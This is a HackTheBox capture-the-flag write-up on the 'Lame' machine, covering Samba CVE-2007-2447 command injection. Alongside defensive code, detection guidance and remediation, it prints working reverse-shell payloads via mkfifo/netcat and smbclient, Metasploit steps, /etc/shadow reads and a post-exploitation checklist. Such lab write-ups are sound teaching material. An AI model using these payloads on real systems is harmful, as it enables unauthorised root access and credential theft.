Overview
Lame is the first machine ever released on HackTheBox, and it carries more
instructional weight than its “easy” rating suggests. The box presents two
network services with well-documented vulnerabilities — vsftpd 2.3.4 (the
infamous backdoor) and Samba 3.0.20 (CVE-2007-2447, a command injection in
the username map script configuration). The vsftpd path is a deliberate
red herring; the Samba vector delivers unauthenticated root in a single step.
What makes Lame valuable isn’t the exploitation — it’s the decision-making. Recognising which vulnerability is exploitable in context, rather than mechanically firing every module in the database, is the difference between a penetration tester and someone running scripts.
Reconnaissance
I start with a service-version scan to fingerprint what’s listening and let nmap’s default scripts run for low-hanging fruit:
```bash
nmap -sC -sV -oA scans/lame 10.129.18.41
```
| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 21 | FTP | vsftpd 2.3.4 | Anonymous login permitted |
| 22 | SSH | OpenSSH 4.7p1 Debian 8ubuntu1 | Banner leaks distro: Ubuntu Hardy |
| 139 | NetBIOS-SSN | Samba smbd 3.0.20-Debian | Workgroup: WORKGROUP |
| 445 | SMB | Samba smbd 3.0.20-Debian | Same Samba instance |
Four services, two interesting version strings. The SSH banner
(OpenSSH 4.7p1 Debian 8ubuntu1) places this squarely on Ubuntu 8.04 Hardy
Heron — a distribution that went end-of-life in May 2013. That context matters:
any software on this host is frozen at 2008-era patch levels.
Attack Surface Analysis
Two services warrant deeper investigation. I deliberately evaluate both before touching Metasploit.
vsftpd 2.3.4 — the backdoor that isn’t
This version of vsftpd is famous for containing a backdoor introduced via a
compromised source tarball in July 2011. The trigger is elegant in its
simplicity: a username ending in :) (a smiley face) causes the daemon to open
a bind shell on port 6200.
The vulnerability is real (CVE-2011-2523), but on this box the trigger is accepted on port 21 and nothing useful answers on 6200: the follow-up connection hangs and no shell appears. This is intentional. The HTB authors neutralised the backdoor (patched or firewalled) to teach exactly this lesson: version matching alone is not vulnerability confirmation. A service can run a vulnerable version with the specific flaw mitigated, patched, or blocked at the network layer.
I confirm the dead end quickly with a manual test rather than burning time on
Metasploit’s vsftpd_234_backdoor module:
```text
nc 10.129.18.41 21
# 220 (vsFTPd 2.3.4)
USER user:)
# 331 Please specify the password.
PASS pass
# [hangs — no shell on 6200]
```
Moving on.
Samba 3.0.20 — CVE-2007-2447
Samba 3.0.0 through 3.0.25rc3 is vulnerable to CVE-2007-2447, a command
injection in the username map script functionality. When the username map script smb.conf option is set, smbd takes the username from the SMB Session Setup request, formats it into a command line, and hands that string to /bin/sh -c through its smbrun() helper (a popen()-style call) so the script can map it to a local account.
The username is not sanitised, so shell metacharacters in the username field
execute arbitrary commands as the Samba process owner. That owner is root: smbd
runs as root so it can switch to the identity of each connecting user.
| Attribute | Value |
|---|---|
| CVE | CVE-2007-2447 |
| CVSS v2 | 6.0 (Medium) — AV:N/AC:M/Au:S/C:P/I:P/A:P |
| CWE | CWE-78 (OS Command Injection) |
| Root cause | Unsanitised username spliced into a shell command line and run via /bin/sh -c (smbrun(), a popen()-style helper) by username map script |
| Affected | Samba 3.0.0 — 3.0.25rc3 |
| Fixed in | Samba 3.0.25 |
| MITRE ATT&CK | T1059.004 (Command and Scripting Interpreter: Unix Shell) |
The CVSS score is misleadingly moderate because the v2 vector assumes
authentication is required (Au:S). In practice, the injection occurs
during the authentication handshake — before credentials are validated — making
it effectively unauthenticated. This is a case where the CVSS score
undersells the actual risk.
Vulnerability Analysis
The vulnerability lives in Samba’s smbd daemon. When a client initiates an
SMB session, it sends a Session Setup AndX request containing a username. If
username map script is configured in smb.conf, Samba invokes the specified
script with the supplied username as an argument:
```c
/* Simplified reconstruction of source/smbd/map_username.c (Samba 3.0.x);
   not the verbatim source. cmd holds the 'username map script' value and
   user holds the name from the Session Setup request. */
pstr_sprintf(command, "%s \"%s\"", cmd, user);   /* username spliced into a shell command line */
ret = smbrun(command, &fd);                       /* smbrun() execs /bin/sh -c "<command>" */
```
The double quotes around the username are meant to contain it, but backtick
and $() command substitution are still evaluated inside double quotes, so they bypass the quoting trivially. Injecting:

```text
/=`nohup mkfifo /tmp/f; nc LHOST LPORT < /tmp/f | /bin/sh > /tmp/f 2>&1`
```

as the username causes the Samba process to execute a reverse shell. The
nohup ensures the shell survives even if the parent SMB session handler
terminates.
This is a textbook CWE-78 violation: user-controlled input flows directly into
a shell command line without sanitisation or parameterisation. The fix in Samba
3.0.25 escapes shell metacharacters in the username before the command string is built. That closes the hole while still routing through a shell; handing the username to the script as a single argv element with no shell involved at all removes the bug class rather than this one instance of it.
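To make the difference concrete, here is an added Python illustration (it is not Samba's code) of the vulnerable shape beside the two fixed shapes. It assumes a POSIX /bin/sh and uses /bin/echo as a stand-in for the configured username map script, so that the effect of shell expansion on the mapped name is visible; the payload string is constructed for the example and only echoes a marker.

```python
"""Added example, not Samba's code: the username map script shape behind
CVE-2007-2447 next to two fixed shapes. MAP_SCRIPT is a stand-in for the
configured script; /bin/echo just reflects its argument so the effect of shell
expansion is visible. Assumes a POSIX /bin/sh and /bin/echo."""
import shlex
import subprocess

MAP_SCRIPT = "/bin/echo"  # stand-in for the 'username map script' value in smb.conf


def _run(cmd, shell: bool) -> str:
    """Run the map script and return its first output line, the way smbd takes
    the first line of the script's output as the mapped username."""
    out = subprocess.run(cmd, shell=shell, capture_output=True, text=True).stdout
    return out.splitlines()[0] if out else ""


def map_username_vulnerable(user: str) -> str:
    """Samba 3.0.20 shape: the username is formatted into a command line that
    /bin/sh -c parses. Double quotes do not stop backtick or $() substitution."""
    return _run(f'{MAP_SCRIPT} "{user}"', shell=True)


def map_username_escaped(user: str) -> str:
    """Shape of the 3.0.25 fix: still a shell, but the username is quoted so
    metacharacters stay literal. shlex.quote stands in for Samba's own escaping."""
    return _run(f"{MAP_SCRIPT} {shlex.quote(user)}", shell=True)


def map_username_no_shell(user: str) -> str:
    """Stronger fix: no shell at all. The username is one argv element, so
    there is no command line to inject into."""
    return _run([MAP_SCRIPT, user], shell=False)


if __name__ == "__main__":
    payload = "/=`echo INJECTED`"  # constructed; same shape as the Metasploit username
    print("vulnerable:", map_username_vulnerable(payload))  # /=INJECTED
    print("escaped:   ", map_username_escaped(payload))     # /=`echo INJECTED`
    print("no shell:  ", map_username_no_shell(payload))    # /=`echo INJECTED`
```

The vulnerable variant returns /=INJECTED because the shell ran the backticked command before echo ever saw the argument; both fixed variants return the username byte for byte. Replace the marker with a reverse-shell command and the vulnerable variant is the Lame exploit.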
Exploitation
I use Metasploit here because the module is reliable and well-tested, but the
underlying exploit is simple enough to reproduce manually with netcat and
smbclient:
```text
msfconsole -q
use exploit/multi/samba/usermap_script
set RHOSTS 10.129.18.41
set LHOST tun0
run
[*] Started reverse TCP handler on 10.10.14.x:4444
[*] Command shell session 1 opened (10.10.14.x:4444 -> 10.129.18.41:xxxxx)
```
Alternatively, without Metasploit, the injection can be triggered with plain
smbclient. The -N flag suppresses the password prompt (the map script runs before the password is checked, so none is needed), and client min protocol=NT1 is required because modern smbclient refuses SMB1 by default:

```bash
# Start listener
nc -lvnp 4444

# Trigger injection via smbclient. Single quotes keep the local shell from
# expanding the backticks; the target's /bin/sh expands them instead.
smbclient //10.129.18.41/tmp -N \
  --option='client min protocol=NT1' \
  -U './=`nohup nc -e /bin/sh 10.10.14.x 4444`'
```

The -e flag depends on the target's netcat build; if it is missing, substitute the mkfifo pipeline used above.
Both methods yield a root shell immediately. No privilege escalation required — the Samba daemon runs as root.
Post-Exploitation
With root access, I enumerate the system to understand what a real attacker would find:
```bash
id
# uid=0(root) gid=0(root)
uname -a
# Linux lame 2.6.24-16-server #1 SMP x86_64 GNU/Linux
cat /etc/shadow | head -5
# root:$1$[hash]:14044:0:99999:7:::
# [...]
# makis:$1$[hash]:14044:0:99999:7:::
```
The password hashes are md5crypt ($1$), an iterated-MD5 scheme with no
meaningful resistance to GPU cracking: weak or reused passwords fall quickly. In a real engagement, I'd extract these for offline cracking and
check for credential reuse across the network.
```bash
cat /home/makis/user.txt
# [redacted]
cat /root/root.txt
# [redacted]
```
What a real attacker does next
This box has limited lateral movement potential in the HTB lab context, but in a production network, the post-exploitation checklist would include:
- Credential harvesting: /etc/shadow hashes, SSH keys in /home/*/.ssh/, the Samba password database (/var/lib/samba/passdb.tdb)
- Network reconnaissance: arp -a, netstat -tlnp, internal DNS records
- Persistence: SSH key injection, cron job, modified PAM configuration
- Pivot: use this host as a jump box to reach internal subnets not directly accessible from the attacker's network
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1190 | IDS signature for shell metacharacters in SMB username fields |
| Execution | T1059.004 | Process telemetry (auditd execve records, Sysmon for Linux) showing /bin/sh spawned by smbd |
| C2 | T1571 | Outbound connection from smbd process to non-standard port |
Network-level: Snort/Suricata can detect this with a rule matching backtick
or $() patterns in SMB Session Setup AndX username fields. The Metasploit
module’s traffic is distinctive — the username field contains obvious shell
syntax that no legitimate SMB client would produce.
Host-level: Any process monitoring tool (Sysmon for Linux, auditd) would
flag /bin/sh being spawned as a child of smbd. In a properly instrumented
environment, this is a high-fidelity alert.
Log artefacts: Samba’s own logs (at log level = 3 or higher) record the
username from the session setup request, which would contain the injection
payload in cleartext.
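As an added example that is not part of the original write-up, the following Python picks the session-setup username out of Samba level-3 log lines and flags shell-breakout tokens. The log lines are constructed for this example; they assume the sesssetupX:name=[DOMAIN]\[user]@[machine] line format that smbd writes at that log level, which is the one assumption the detector depends on.

```python
"""Added example, not from the original write-up: scan Samba log lines for
CVE-2007-2447-style usernames. The sample lines below are constructed for this
example; they follow the 'sesssetupX:name=[DOMAIN]\\[user]@[machine]' line that
smbd emits at log level 3, which this code assumes as the input format."""
import re
from typing import Dict, List, Optional

# Constructed sample: two benign session setups and two injection attempts.
SAMPLE_LOG = """\
[2024/05/01 10:00:01, 3] smbd/sesssetup.c:reply_sesssetupX(...)
  sesssetupX:name=[WORKGROUP]\\[alice]@[ws01]
[2024/05/01 10:00:07, 3] smbd/sesssetup.c:reply_sesssetupX(...)
  sesssetupX:name=[]\\[/=`nohup nc -e /bin/sh 10.10.14.5 4444`]@[kali]
[2024/05/01 10:00:09, 3] smbd/sesssetup.c:reply_sesssetupX(...)
  sesssetupX:name=[]\\[/=$(sh -c id)]@[kali]
[2024/05/01 10:00:12, 3] smbd/sesssetup.c:reply_sesssetupX(...)
  sesssetupX:name=[WORKGROUP]\\[bob.o'neil]@[ws02]
"""

# The session-setup line: domain, then a backslash, then the username, then the
# client machine name. The username group is greedy because it may contain ']'.
SESSION_SETUP_RE = re.compile(
    r"sesssetupX:name=\[(?P<domain>[^\]]*)\]\\\[(?P<user>.*)\]@\[(?P<machine>[^\]]*)\]\s*$"
)

# Tokens that still reach the shell from inside the double quotes smbd wraps the
# username in. A lone apostrophe is inert there, so it is deliberately not listed.
SHELL_METACHARS = ("`", "$(", "${", '"', "\\")


def extract_session_users(log_text: str) -> List[Dict[str, str]]:
    """Pull (domain, user, machine) out of every session-setup line."""
    records = []
    for line in log_text.splitlines():
        match = SESSION_SETUP_RE.search(line)
        if match:
            records.append(match.groupdict())
    return records


def injected_metachar(username: str) -> Optional[str]:
    """Return the first shell-breakout token found in a username, else None."""
    for token in SHELL_METACHARS:
        if token in username:
            return token
    return None


def find_injections(log_text: str) -> List[Dict[str, str]]:
    """Session-setup records whose username no legitimate SMB client would send."""
    alerts = []
    for record in extract_session_users(log_text):
        token = injected_metachar(record["user"])
        if token is not None:
            alerts.append({**record, "metachar": token})
    return alerts


if __name__ == "__main__":
    for alert in find_injections(SAMPLE_LOG):
        print(f"ALERT from={alert['machine']} token={alert['metachar']!r} user={alert['user']!r}")
```

Run it over a real log.smbd and keep the token list tight: the point is that backticks, $( and a bare double quote never appear in a username produced by a real client, so the rule fires with essentially no false positives, whereas matching on apostrophes or dots would page on ordinary accounts.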
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Upgrade Samba to 3.0.25+ (or current stable) | Low | Critical |
| P0 | Upgrade Ubuntu from 8.04 to a supported release | High | Critical |
| P1 | Disable username map script if not required | Low | High |
| P1 | Confine smbd with an AppArmor/SELinux profile (smbd must start as root to switch to each connecting user, so a fully non-root daemon is rarely practical) | Medium | High |
| P2 | Block SMB (139/445) at the perimeter firewall | Low | Medium |
| P2 | Deploy network IDS with SMB protocol inspection | Medium | Medium |
| P3 | Migrate from MD5 password hashes to SHA-512 | Low | Medium |
The deeper issue here isn’t the CVE — it’s the operating system. Ubuntu 8.04 has been unsupported for over a decade. Every package on this host is frozen at 2008 patch levels, meaning the attack surface extends far beyond Samba. The correct remediation isn’t “patch Samba” — it’s “decommission or rebuild this host on a supported distribution.”
For organisations that genuinely cannot upgrade legacy systems (OT environments, regulatory constraints), compensating controls must include: network isolation (VLAN segmentation with strict ACLs), protocol-level monitoring (SMB deep packet inspection), and application-layer firewalling that blocks anomalous SMB session parameters.
Key Takeaways
- Version matching is necessary but not sufficient. vsftpd 2.3.4 is “vulnerable” by CVE database lookup, but the backdoor is non-functional on this host. Confirming exploitability in context, not just version presence, is what separates penetration testing from vulnerability scanning.
- CVSS scores can mislead. CVE-2007-2447 scores 6.0 (Medium) because the v2 vector assumes authentication is required. The actual exploitation path is unauthenticated. Always read the technical details behind the score.
- Command injection via configuration features is a recurring pattern. The username map script flaw is architecturally similar to Shellshock (CGI handlers passing unsanitised input to bash), Log4Shell (JNDI lookups in log messages), and countless other vulnerabilities where a “feature” inadvertently creates a code execution path. The lesson: any configuration option that invokes a shell with user-controlled input is a latent vulnerability.